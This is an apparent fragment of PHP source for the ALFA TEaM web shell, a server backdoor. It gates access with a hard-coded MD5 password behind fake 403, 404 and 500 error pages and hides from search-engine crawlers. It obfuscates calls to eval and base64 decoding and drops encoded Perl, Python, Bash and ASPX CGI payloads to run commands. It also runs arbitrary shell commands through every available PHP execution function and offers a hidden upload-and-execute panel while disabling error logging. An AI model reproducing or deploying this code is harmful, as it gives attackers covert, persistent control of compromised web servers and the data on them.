'alfa', 'password' => 'a6f452ec3293d7fb72c5b677257b20ec',//md5(ehsan) 'safe_mode' => '0', 'login_page' => '403', 'show_icons' => '1', 'post_encryption' => false, 'cgi_api' => true, ); $CWppUDJxuf = 'fu' . 'n' . 'ct' . 'ion_' . 'e' . 'xist' . 's'; $aztJtafUXm = 'cha' . 'r' . 'C' . 'o' . 'd' . 'e' . 'A' . 't' . ''; $OVpGNqqFZs = 'e' . 'v' . 'al'; $psDEwGhsxg = 'gz' . 'inf' . 'late'; if (!$CWppUDJxuf('b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . '')) { function vcnvSCZgBz($data) { if (empty($data)) { return; } $b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0; $ac = 0; $enc = ''; $tmp_arr = array(); if (!$data) { return $data; } do { $o1 = $aztJtafUXm($data, $i++); $o2 = $aztJtafUXm($data, $i++); $o3 = $aztJtafUXm($data, $i++); $bits = $o1 << 16 | $o2 << 8 | $o3; $h1 = $bits >> 18 & 0x3f; $h2 = $bits >> 12 & 0x3f; $h3 = $bits >> 6 & 0x3f; $h4 = $bits & 0x3f; $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4); } while ($i < strlen($data)); $enc = implode($tmp_arr, ''); $r = (strlen($data) % 3); return ($r ? substr($enc, 0, ($r - 3)) : $enc) . substr('===', ($r || 3)); } function charCodeAt($data, $char) { return ord(substr($data, $char, 1)); } function charAt($data, $char) { return substr($data, $char, 1); } } else { function vcnvSCZgBz($s) { $b = 'b' . 'a' . 'se64' . '_en' . 'c' . 'ode' . ''; return $b($s); } } if (!$CWppUDJxuf('b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . '')) { function zRtSHsbTzV($input) { if (empty($input)) { return; } $keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; $i = 0; $output = ""; $input = preg_replace("[^A-Za-z0-9\+\/\=]", "", $input); do { $enc1 = strpos($keyStr, substr($input, $i++, 1)); $enc2 = strpos($keyStr, substr($input, $i++, 1)); $enc3 = strpos($keyStr, substr($input, $i++, 1)); $enc4 = strpos($keyStr, substr($input, $i++, 1)); $chr1 = ($enc1 << 2) | ($enc2 >> 4); $chr2 = (($enc2 & 15) << 4) | ($enc3 >> 2); $chr3 = (($enc3 & 3) << 6) | $enc4; $output = $output . chr((int)$chr1); if ($enc3 != 64) { $output = $output . chr((int)$chr2); } if ($enc4 != 64) { $output = $output . chr((int)$chr3); } $chr1 = $chr2 = $chr3 = ""; $enc1 = $enc2 = $enc3 = $enc4 = ""; } while ($i < strlen($input)); return $output; } } else { function zRtSHsbTzV($s) { $b = 'b' . 'a' . 'se' . '6' . '4' . '_d' . 'ecod' . 'e' . ''; return $b($s); } } function __ZW5jb2Rlcg($s) { return vcnvSCZgBz($s); } function __ZGVjb2Rlcg($s) { return zRtSHsbTzV($s); } $GLOBALS['DB_NAME'] = $GLOBALS['oZgNypoPRU']; foreach ($GLOBALS['DB_NAME'] as $key => $value) { $prefix = substr($key, 0, 2); if ($prefix == "us") { $GLOBALS['DB_NAME']["user"] = $value; $GLOBALS['DB_NAME']["user_rand"] = $key; } elseif ($prefix == "pa") { $GLOBALS['DB_NAME']["pass"] = $value; $GLOBALS['DB_NAME']["pass_rand"] = $key; } elseif ($prefix == "sa") { $GLOBALS['DB_NAME']["safemode"] = $value; $GLOBALS['DB_NAME']["safemode_rand"] = $key; } elseif ($prefix == "lo") { $GLOBALS['DB_NAME']["login_page"] = $value; $GLOBALS['DB_NAME']["login_page_rand"] = $key; } elseif ($prefix == "sh") { $GLOBALS['DB_NAME']["show_icons"] = $value; $GLOBALS['DB_NAME']["show_icons_rand"] = $key; } elseif ($prefix == "po") { $GLOBALS['DB_NAME']["post_encryption"] = $value; $GLOBALS['DB_NAME']["post_encryption_rand"] = $key; } elseif ($prefix == "cg") { $GLOBALS['DB_NAME']["cgi_api"] = $value; $GLOBALS['DB_NAME']["cgi_api_rand"] = $key; } } unset($GLOBALS['oZgNypoPRU']); if (!isset($_SERVER["HTTP_HOST"])) { exit(); } if (!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler","bot","spider"); if (preg_match('/'.implode('|', $userAgents).'/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } if (!isset($GLOBALS['DB_NAME']['user'])) { exit('$GLOBALS[\'DB_NAME\'][\'user\']'); } if (!isset($GLOBALS['DB_NAME']['pass'])) { exit('$GLOBALS[\'DB_NAME\'][\'pass\']'); } if (!isset($GLOBALS['DB_NAME']['safemode'])) { exit('$GLOBALS[\'DB_NAME\'][\'safemode\']'); } if (!isset($GLOBALS['DB_NAME']['login_page'])) { exit('$GLOBALS[\'DB_NAME\'][\'login_page\']'); } if (!isset($GLOBALS['DB_NAME']['show_icons'])) { exit('$GLOBALS[\'DB_NAME\'][\'show_icons\']'); } if (!isset($GLOBALS['DB_NAME']['post_encryption'])) { exit('$GLOBALS[\'DB_NAME\'][\'post_encryption\']'); } define("__ALFA_VERSION__", "4.1"); define("__ALFA_UPDATE__", "2"); define("__ALFA_CODE_NAME__", "Tesla"); define("__ALFA_DATA_FOLDER__", "ALFA_DATA"); define("__ALFA_POST_ENCRYPTION__", (isset($GLOBALS["DB_NAME"]["post_encryption"]) && $GLOBALS["DB_NAME"]["post_encryption"] == true ? true : false)); define("__ALFA_SECRET_KEY__", __ALFA_POST_ENCRYPTION__ ? _AlfaSecretKey() : ''); $GLOBALS['__ALFA_COLOR__'] = array( "shell_border" => array( "key_color" => "#0E304A", "multi_selector" => array( ".header" => "border: 7px solid {color}", "#meunlist" => "border-color: {color}", "#hidden_sh" => "background-color: {color}", ".ajaxarea" => "border: 1px solid {color}", ".foot" => "border-color: {color}", ) ), "header_vars" => "#27979B", "header_values" => "#67ABDF", "header_on" => "#00FF00", "header_off" => "#ff0000", "header_none" => "#00FF00", "home_shell" => "#ff0000", "home_shell:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".home_shell:hover" => "color: {color};", ) ), "back_shell" => "#efbe73", "back_shell:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".back_shell:hover" => "color: {color};", ) ), "header_pwd" => "#00FF00", "header_pwd:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".header_pwd:hover" => "color: {color};", ) ), "header_drive" => "#00FF00", "header_drive:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".header_drive:hover" => "color: {color};", ) ), "header_show_all" => "#00FF00", "disable_functions" => "#ff0000", "footer_text" => "#27979B", "menu_options" => "#27979B", "menu_options:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".menu_options:hover" => "background-color: {color};font-weight: unset;", ) ), "options_list" => array( "key_color" => "#00FF00", "multi_selector" => array( ".content_options_holder .header center a" => "color: {color};", ) ), "options_list:hover" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".content_options_holder .header center a:hover" => "color: {color};", ) ), "options_list_header" => array( "key_color" => "#59cc33", "multi_selector" => array( ".txtfont_header" => "color: {color};", ) ), "options_list_text" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".txtfont,.tbltxt" => "color: {color};", ) ), "Alfa+" => array( "key_color" => "#06ff0f", "multi_selector" => array( ".alfa_plus" => "color: {color};font-weight: unset;", ) ), "hidden_shell_text" => array( "key_color" => "#00FF00", "multi_selector" => array( "#hidden_sh a" => "color: {color};", ) ), "hidden_shell_version" => "#ff0000", "shell_name" => "#FF0000", "main_row:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".main tr:hover" => "background-color: {color};", ) ), "main_header" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".main th" => "color: {color};", ) ), "main_name" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".main .main_name" => "color: {color};font-weight: unset;", ) ), "main_size" => "#67ABDF", "main_modify" => "#67ABDF", "main_owner_group" => "#67ABDF", "main_green_perm" => "#25ff00", "main_red_perm" => "#FF0000", "main_white_perm" => "#FFFFFF", "beetween_perms" => "#FFFFFF", "main_actions" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".main .actions" => "color: {color};", ) ), "menu_options:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".menu_options:hover" => "background-color: {color};font-weight: unset;", ) ), "minimize_editor_background" => array( "key_color" => "#0e304a", "multi_selector" => array( ".minimized-wrapper" => "background-color: {color};", ) ), "minimize_editor_text" => array( "key_color" => "#f5deb3", "multi_selector" => array( ".minimized-text" => "color: {color};", ) ), "editor_border" => array( "key_color" => "#0e304a", "multi_selector" => array( ".editor-explorer,.editor-modal" => "border: 2px solid {color};", ) ), "editor_background" => array( "key_color" => "rgba(0, 1, 23, 0.94)", "multi_selector" => array( ".editor-explorer,.editor-modal" => "background-color: {color};", ) ), "editor_header_background" => array( "key_color" => "rgba(21, 66, 88, 0.93)", "multi_selector" => array( ".editor-header" => "background-color: {color};", ) ), "editor_header_text" => array( "key_color" => "#00ff7f", "multi_selector" => array( ".editor-path" => "color: {color};", ) ), "editor_header_button" => array( "key_color" => "#1d5673", "multi_selector" => array( ".close-button, .editor-minimize" => "background-color: {color};", ) ), "editor_actions" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".editor_actions" => "color: {color};", ) ), "editor_file_info_vars" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".editor_file_info_vars" => "color: {color};", ) ), "editor_file_info_values" => array( "key_color" => "#67ABDF", "multi_selector" => array( ".filestools" => "color: {color};", ) ), "editor_history_header" => array( "key_color" => "#14ff07", "multi_selector" => array( ".hheader-text,.history-clear" => "color: {color};", ) ), "editor_history_list" => array( "key_color" => "#03b3a3", "multi_selector" => array( ".editor-file-name" => "color: {color};", ) ), "editor_history_selected_file" => array( "key_color" => "rgba(49, 55, 93, 0.77)", "multi_selector" => array( ".is_active" => "background-color: {color};", ) ), "editor_history_file:hover" => array( "key_color" => "#646464", "multi_selector" => array( ".file-holder > .history:hover" => "background-color: {color};", ) ), "input_box_border" => array( "key_color" => "#0E304A", "multi_selector" => array( "input[type=text],textarea" => "border: 1px solid {color}", ) ), "input_box_text" => array( "key_color" => "#999999", "multi_selector" => array( "input[type=text],textarea" => "color: {color};", ) ), "input_box:hover" => array( "key_color" => "#27979B", "multi_selector" => array( "input[type=text]:hover,textarea:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "select_box_border" => array( "key_color" => "#0E304A", "multi_selector" => array( "select" => "border: 1px solid {color}", ) ), "select_box_text" => array( "key_color" => "#FFFFEE", "multi_selector" => array( "select" => "color: {color};", ) ), "select_box:hover" => array( "key_color" => "#27979B", "multi_selector" => array( "select:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "button_border" => array( "key_color" => "#27979B", "multi_selector" => array( "input[type=submit],.button,#addup" => "border: 1px solid {color};", ) ), "button:hover" => array( "key_color" => "#27979B", "multi_selector" => array( "input[type=submit]:hover" => "box-shadow:0 0 4px {color};border:2px solid {color};", ".button:hover,#addup:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "outputs_text" => array( "key_color" => "#67ABDF", "multi_selector" => array( ".ml1" => "color: {color};", ) ), "outputs_border" => array( "key_color" => "#0E304A", "multi_selector" => array( ".ml1" => "border: 1px solid {color};", ) ), "uploader_border" => array( "key_color" => "#0E304A", "multi_selector" => array( ".inputfile" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "uploader_background" => array( "key_color" => "#0E304A", "multi_selector" => array( ".inputfile strong" => "background-color: {color};", ) ), "uploader_text_right" => array( "key_color" => "#FFFFFF", "multi_selector" => array( ".inputfile strong" => "color: {color};", ) ), "uploader_text_left" => array( "key_color" => "#25ff00", "multi_selector" => array( ".inputfile span" => "color: {color};", ) ), "uploader:hover" => array( "key_color" => "#27979B", "multi_selector" => array( ".inputfile:hover" => "box-shadow:0 0 4px {color};border:1px solid {color};", ) ), "uploader_progress_bar" => array( "key_color" => "#00ff00", "multi_selector" => array( ".up_bar" => "background-color: {color};", ) ), "mysql_tables" => "#00FF00", "mysql_table_count" => "#67ABDF", "copyright" => "#dfff00", "scrollbar" => array( "key_color" => "#1e82b5", "multi_selector" => array( "*::-webkit-scrollbar-thumb" => "background-color: {color};", ) ), "scrollbar_background" => array( "key_color" => "#000115", "multi_selector" => array( "*::-webkit-scrollbar-track" => "background-color: {color};", ) ), ); $GLOBALS['__file_path'] = str_replace('\\', '/', trim(preg_replace('!\(\d+\)\s.*!', '', __FILE__))); $config = array('AlfaUser' => $GLOBALS['DB_NAME']['user'],'AlfaPass' => $GLOBALS['DB_NAME']['pass'],'AlfaProtectShell' => $GLOBALS['DB_NAME']['safemode'],'AlfaLoginPage' => $GLOBALS['DB_NAME']['login_page']); //@session_start(); @session_write_close(); @ignore_user_abort(true); @set_time_limit(0); @ini_set('memory_limit', '-1'); @ini_set("upload_max_filesize", "9999m"); if ($config['AlfaProtectShell']) { $SERVER_SIG = (isset($_SERVER["SERVER_SIGNATURE"]) ? $_SERVER["SERVER_SIGNATURE"] : ""); $Eform = '
'; if ($config['AlfaLoginPage'] == 'gui') { if (@$_COOKIE["AlfaUser"] != $config['AlfaUser'] && $_COOKIE["AlfaPass"] != md5($config['AlfaPass'])) { if (@$_POST["usrname"] == $config['AlfaUser'] && @md5($_POST["password"]) == $config['AlfaPass']) { __alfa_set_cookie("AlfaUser", $config['AlfaUser']); __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass'])); @header('location: '.$_SERVER["PHP_SELF"]); } echo ' ~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~
alfa team 2012

~ ALFA TEaM Shell-v'.__ALFA_VERSION__.'-'.__ALFA_CODE_NAME__.' ~
Login:
Password:
 

'; exit; } } elseif ($config['AlfaLoginPage'] == '500') { if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) { if (@md5($_POST["password"]) == $config['AlfaPass']) { __alfa_set_cookie("AlfaUser", $config['AlfaUser']); __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass'])); @header('location: '.$_SERVER["PHP_SELF"]); } echo '500 Internal Server Error

Internal Server Error

The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, '.$_SERVER['SERVER_ADMIN'].' and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

'.$SERVER_SIG.''.$Eform; exit; } } elseif ($config['AlfaLoginPage'] == '403') { if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) { if (@md5($_POST["password"]) == $config['AlfaPass']) { __alfa_set_cookie("AlfaUser", $config['AlfaUser']); __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass'])); @header('location: '.$_SERVER["PHP_SELF"]); } echo "403 Forbidden

Forbidden

You don't have permission to access ".$_SERVER['PHP_SELF']." on this server.

".$SERVER_SIG."".$Eform; exit; } } elseif ($config['AlfaLoginPage'] == '404') { if (@$_COOKIE["AlfaPass"] != @md5($config['AlfaPass'])) { if (@md5($_POST["password"]) == $config['AlfaPass']) { __alfa_set_cookie("AlfaUser", $config['AlfaUser']); __alfa_set_cookie("AlfaPass", @md5($config['AlfaPass'])); @header('location: '.$_SERVER["PHP_SELF"]); } echo "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

".$SERVER_SIG."".$Eform; exit; } } } function decrypt_post($str) { if (__ALFA_POST_ENCRYPTION__) { $pwd = __ALFA_SECRET_KEY__; $pwd = __ZW5jb2Rlcg($pwd); $str = __ZGVjb2Rlcg($str); $enc_chr = ""; $enc_str = ""; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return __ZGVjb2Rlcg($enc_str); } else { return __ZGVjb2Rlcg($str); } } function _AlfaSecretKey() { $secret = @$_COOKIE["AlfaSecretKey"]; if (!isset($_COOKIE["AlfaSecretKey"])) { $secret = uniqid(mt_rand(), true); __alfa_set_cookie("AlfaSecretKey", $secret); } return $secret; } function alfa_getColor($target) { if (isset($GLOBALS["DB_NAME"]["color"][$target]) && $GLOBALS["DB_NAME"]["color"][$target] != "") { return $GLOBALS["DB_NAME"]["color"][$target]; } else { $target = $GLOBALS["__ALFA_COLOR__"][$target]; if (is_array($target)) { return $target["key_color"]; } else { return $target; } } } function alfaCssLoadColors() { $css = ""; foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value) { if (!is_array($value)) { $value = alfa_getColor($key); $css .= ".{$key}{color: {$value};}"; } else { if (isset($value["multi_selector"])) { foreach ($value["multi_selector"] as $k => $v) { $color = alfa_getColor($key); $code = str_replace("{color}", $color, $v); $css .= $k."{".$code."}"; } } } } return $css; } if (isset($_POST['ajax'])) { function AlfaNum() { $args = func_get_args(); $alfax = array(); $find = array(); for ($i = 1;$i <= 10;$i++) { $alfax[] = $i; } foreach ($args as $arg) { $find[] = $arg; } echo ''; } } function _alfa_cgicmd($cmd, $lang = "perl", $set_cookie = false) { if (!$GLOBALS["DB_NAME"]["cgi_api"]) { return ""; } if (isset($_COOKIE["alfacgiapi_mode"])) { return ""; } $cmd_pure = $cmd; $is_curl = function_exists('curl_version'); $is_socket = function_exists('fsockopen'); if ($is_curl || $is_socket) { $recreate = false; if (isset($_COOKIE["alfacgiapi"])) { if (!@file_exists("alfacgiapi/".$_COOKIE["alfacgiapi"].".alfa")) { $recreate = true; $lang = $_COOKIE["alfacgiapi"]; } } if (!isset($_COOKIE["alfacgiapi"]) || $recreate) { @chdir(dirname($_SERVER["SCRIPT_FILENAME"])); $perl = 'jZFRT8IwFIXf/RXXOqWNsKoxPlAwRliERIbK9EUMGdsFGrYyt2Iky/ztdkMlJj74cpKee853k96Dfb7OUj6ViieYRgDQ6FdOtAr8iE99FcZS7a0zhEF/4DSb136GF+ciSaXSQDorpVHpht4k2ASN75ovdByN1VgRIWfUctynvPbg3D86I28ycLzesFsrAF+B3A1HHmF5vAFqyTpYS9wYffMjo1IxkaIf0pHX7buVYaRidYau57je5NZxb7xerWDiSipoQ5ZEUlN+xL/qs5UBBAvzAHoCtg3WgbFzM3u25Au0PyDj42MOfC7objfbkdpbUpmuwxkTZWhbO6S2zXjiB0tKAlKHBb5T65QxPkdRQv6RkioveQXYbSDjEwJyBjTEmVQY0p8pY7+TJVwU5bcalwRxSAqWby8RYrAKcTKtrvM1X2CwNAmbtJIUL4nINpnGmP4VrVDs+6otXhWK4hM='; $py = "bZDBS8MwGMXPy19R66EtzhRk7DA3L1rxItOt3gajTb6twTQJydexIf7vJqvMiR5CyHvv93jk8iLvnM1roXJzwEYrgvYwIQPRGm0xYluB9W1/UVBVLSHNCOwZGPQpUzlHvqPaDX1sWFcOxiOy0baNZgGkjwIkX6K21RZSUDthtZp9JIvi9a1YluvnonyaPyST5GW+LJPPjLCWezIU0C3grpIdpIkXE281wN7/MYPsbWOFwii+1wpB4TUeDEwQ9pg32MqVXalwYiI2ka8L84/5fjGtxyMOTHNIj3XZVTw1Fu5iMmCNkHztkAs1jE4P3aFfoh012oC6Sf/WtDzLftGUSe3CBw4suE4G/ryOWqh4eo4E8cT0a3uSOrTC/KjxND+O/QI="; $bash = "rVRdj5pAFH2uv+I6DGa1Iaybpg9amrRboptYbV360JQGWRiFyPI5WreU/95hoCyjsfFh52nm3nM/zuTcK3XVBz9UH+zM6xDHi0AhgG6jkJKQKvQpJiOg5EBVjz4GZmiGqLPehQ71oxCcjW9tCLW+LO4Na2+n2VU/7wA7PwDhpf71m87sn3VjuviEoKsBKoEIfkKvBymhuzSs0V1QfrMQFrD8bt0by7v5xDqH5cjbxdzQ54Y10+cTYyrCXqXEdkGZwxEKTtLzjHVUIdJyiRO5hHF6poQlUEICw5OegsixA9gDBY+/qYZwPlTV1yoUsoy47ZfnB6RMkku0AGVD4RoUmzHJaVH9jcxYjMGNOLw8+zLNvmAIWTblQYEaDy9ApYHcsvnrC7JTj4RNRHk8jUFG16ObQjBXBZgVCea6I7T6pxOTnQPOvWLV4NY+v7pRSPiFQ6uw/3w3U5Gon/KzAwo3Zz47gRi27MszbnPsjAAegv9MbqIbfaH3RmR5WwZFLZ1EO3b0ROrjcfMslSPmPpmDCypz8Nnylfd8Dx8XxvRF+b0MhaS4nAbJbIdfMs9f0+qmIcADECemrpwcj0fMC8pyrz0Z29IYy7LWNnLZxtJAa9mqdiUcC+Hl3hoiYPPyYTZDoHDlZirgLaj1IOGsJmwKpMghjlLK3FukoZWwQcBEeG+iFRIHoxmElv65toDV7iQ7kj5p+IqPD3YeXfgDbEWTt29AUarU/WpdNxiPONuzqHKpv4tT8t50UId1FbBdwWsULb9aA/4C"; $aspx = "jZNda9swFIavk18hNAoOAXdsozdLyrrUKYaRlriNN0IuFPvEFbUl70jOB2P97T1SPBo8ynZlS+d53/Ph49HZF3YnCmDfhCoaehnzyTvOIiXWJSwk7BIrLF1uRGmAs7PL/ogUcVVrtGwmKjC1yCieHIyFKkxhHT7E7jHRyqIuzb8111IUShsrs/+A41vPENTvGYtSFSyrcjZmc/jZgLHhVGO15HTHV59fkUfInv6G3K3H5CZokTHj6cfZdn2z+CC+z+of1b7cVNOdWLwf88Gvfq+3PlhYrlgurCDDtipqdgtIvqirr8LAxafEJw6ojgH59441tvQ97G14lUziOFKZzok7nsIbsK3O2ZOQlHeoMzCG1aRXsGPtOfC2dUifB22sNjqcINCXmulUqlzviLbYQBeayhLcUCnsZhTCHniXucKiqUBZ46DzjHE2dDPuYg8Gkkcoy2gPWWOdo9+RLjaHXCJk1JhQucD8trF1Y98orwtHiBrfYFONTzSqay/QePDVnjYTHAfYroD+k9dHT0qhpCK/15HKgwF1+hr2yU+jzntO+6iVgTBFaSHgS6NL2Eoj6Xd5FrVcjWqESz48phvy0bk/O+3vPi3uCw=="; if ($lang == "perl") { $source = $perl; } elseif ($lang == "py") { $source = $py; } else { $source = $bash; } if ($lang == "aspx") { alfaWriteTocgiapi("aspx.aspx", $aspx); } else { alfaWriteTocgiapi($lang.".alfa", $source); } alfacgihtaccess('cgi', "alfacgiapi/"); } else { $lang = $_COOKIE["alfacgiapi"]; } $cgi_ext = ".alfa"; if ($lang == "aspx") { $cgi_ext = ".aspx"; } $cgi_url = __ALFA_DATA_FOLDER__."/alfacgiapi/".$lang.$cgi_ext; $cmd = "check=W3NvbGV2aXNpYmxlfmFwaV0=&cmd=".__ZW5jb2Rlcg("cd ".$GLOBALS['cwd'].";".$cmd); if ($is_curl) { $address = ($_SERVER['SERVER_PORT'] == 443 ? "https://" : "http://").$_SERVER["SERVER_NAME"].dirname($_SERVER["REQUEST_URI"])."/".$cgi_url; $post = new AlfaCURL(); $data = $post->Send($address, "post", $cmd); } elseif ($is_socket) { $server = $_SERVER["SERVER_NAME"]; $uri = dirname($_SERVER["REQUEST_URI"])."/".$cgi_url; $data = _alfa_fsockopen($server, $uri, $cmd); } $out = ""; if (strpos($data, "[solevisible~api]") !== false && strpos($data, '[solevisible~api]
"+output+"
') === false) { if ($set_cookie) { __alfa_set_cookie("alfacgiapi", $lang); } if (@preg_match("/
(.*?)<\/pre>/s", $data, $res)) {
        $out = $res[1];
      }
    } elseif ($lang == "perl") {
      return _alfa_cgicmd($cmd_pure, "py", $set_cookie);
    } elseif ($lang == "py") {
      return _alfa_cgicmd($cmd_pure, "bash", $set_cookie);
    } elseif ($lang == "bash" && $GLOBALS['sys'] == "win") {
      return _alfa_cgicmd($cmd_pure, "aspx", $set_cookie);
    } else {
      if ($set_cookie) {
        __alfa_set_cookie("alfacgiapi_mode", "off");
      }
    }
    return trim($out);
  } else {
    return "";
  }
}
function alfaGetCwd() {
  if (function_exists("getcwd")) {
    return @getcwd();
  } else {
    return dirname($_SERVER["SCRIPT_FILENAME"]);
  }
}
function alfaEx($in, $re = false, $cgi = true, $all = false) {
  $data = _alfa_php_cmd($in, $re);
  if (empty($data) && $cgi || $all) {
    if ($GLOBALS['sys'] == 'unix') {
      if (strlen(_alfa_php_cmd("whoami")) == 0 || $all) {
        $cmd = _alfa_cgicmd($in);
        if (!empty($cmd)) {
          return $cmd;
        }
      }
    }
  }
  return $data;
}
function _alfa_php_cmd($in, $re = false) {
  $out = '';
  try {
    if ($re) {
      $in = $in." 2>&1";
    }
    if (function_exists('exec')) {
      @exec($in, $out);
      $out = @join("\n", $out);
    } elseif (function_exists('passthru')) {
      ob_start();
      @passthru($in);
      $out = ob_get_clean();
    } elseif (function_exists('system')) {
      ob_start();
      @system($in);
      $out = ob_get_clean();
    } elseif (function_exists('shell_exec')) {
      $out = shell_exec($in);
    } elseif (function_exists("popen") && function_exists("pclose")) {
      if (is_resource($f = @popen($in, "r"))) {
        $out = "";
        while (!@feof($f)) {
          $out .= fread($f, 1024);
        }
        pclose($f);
      }
    } elseif (function_exists('proc_open')) {
      $pipes = array();
      $process = @proc_open($in.' 2>&1', array(array("pipe","w"), array("pipe","w"), array("pipe","w")), $pipes, null);
      $out = @stream_get_contents($pipes[1]);
    } elseif (class_exists('COM')) {
      $alfaWs = new COM('WScript.shell');
      $exec = $alfaWs->exec('cmd.exe /c '.$_POST['alfa1']);
      $stdout = $exec->StdOut();
      $out = $stdout->ReadAll();
    }
  } catch (Exception $e) {
  }
  return $out;
}
function _alfa_fsockopen($server, $uri, $post) {
  $socket = @fsockopen($server, 80, $errno, $errstr, 15);
  if ($socket) {
    $http  = "POST {$uri} HTTP/1.0\r\n";
    $http .= "Host: {$server}\r\n";
    $http .= "User-Agent: " . $_SERVER['HTTP_USER_AGENT'] . "\r\n";
    $http .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $http .= "Content-length: " . strlen($post) . "\r\n";
    $http .= "Connection: close\r\n\r\n";
    $http .= $post . "\r\n\r\n";
    fwrite($socket, $http);
    $contents = "";
    while (!@feof($socket)) {
      $contents .= @fgets($socket, 4096);
    }
    list($header, $body) = explode("\r\n\r\n", $contents, 2);
    @fclose($socket);
    return $body;
  } else {
    return "";
  }
}
if (isset($_GET["solevisible"])) {
  @error_reporting(E_ALL ^ E_NOTICE);
  echo '';
  echo "Solevisible Hidden Shell";
  echo "";
  echo 'Kernel : '.(function_exists('php_uname') ? php_uname() : '???').'';
  $safe_mode = @ini_get('safe_mode');
  if ($safe_mode) {
    $r = "On";
  } else {
    $r = "Off";
  }
  echo "
OS: " . PHP_OS . "
";
  echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "
";
  echo "PHP Version: " . PHP_VERSION .  "
";
  echo "PWD: " . str_replace("\\", "/", @alfaGetCwd()) . "/
";
  echo "Safe Mode : $r
";
  echo"Disable functions : ";
  $disfun = @ini_get('disable_functions');
  if (empty($disfun)) {
    $disfun = 'NONE';
  }
  echo"";
  echo "$disfun";
  echo"
";
  echo "Your Ip Address is :  " . $_SERVER['REMOTE_ADDR'] . "
";
  echo "Server Ip Address is :  ".(function_exists('gethostbyname') ? @gethostbyname($_SERVER["HTTP_HOST"]) : '???')."
";
  echo '
';
  echo 'CWD: 
';
  if (isset($_FILES['file'])) {
    if (@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])) {
      echo '
Upload Successfully ;)

';
    } else {
      echo '
Upload failed :(


';
    }
  }
  echo '
Execute Command: 


';
  if (isset($_POST['command_solevisible'])) {
    if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
      $separator = '&';
    } else {
      $separator = ';';
    }
    $solevisible = "cd '".addslashes(str_replace("\\", "/", @alfaGetCwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);
    echo alfaEx($solevisible);
  }
  echo'

';
  exit;
}
@error_reporting(E_ALL ^ E_NOTICE);
@ini_set('error_log', null);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('magic_quotes_runtime', 0);
@set_time_limit(0);
if (function_exists('set_magic_quotes_runtime')) {
  @set_magic_quotes_runtime(0);
}
foreach ($_POST as $key => $value) {
  if (is_array($_POST[$key])) {
    $i = 0;
    foreach ($_POST[$key] as $f) {
      $f = trim(str_replace(' ', '+', $f));
      $_POST[$key][$i] = decrypt_post($f);
      $i++;
    }
  } else {
    $value = trim(str_replace(' ', '+', $value));
    $_POST[$key] = decrypt_post($value);
  }
}
$default_action = 'FilesMan2';//'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if (strtolower(substr(PHP_OS, 0, 3)) == "win") {
  $GLOBALS['sys'] = 'win';
} else {
  $GLOBALS['sys'] = 'unix';
}
$GLOBALS['home_cwd'] = @alfaGetCwd();
$GLOBALS["need_to_update_header"] = "false";
$GLOBALS['glob_chdir_false'] = false;
if (isset($_POST['c'])) {
  if (!@chdir($_POST['c'])) {
    $GLOBALS['glob_chdir_false'] = true;
  }
}
$GLOBALS['cwd'] = (isset($_POST['c']) && @is_dir($_POST['c']) ? $_POST['c'] : @alfaGetCwd());
if ($GLOBALS['glob_chdir_false']) {
  $GLOBALS['cwd'] = (isset($_POST['c']) && !empty($_POST['c']) ? $_POST['c'] : @alfaGetCwd());
}
if ($GLOBALS['sys'] == 'win') {
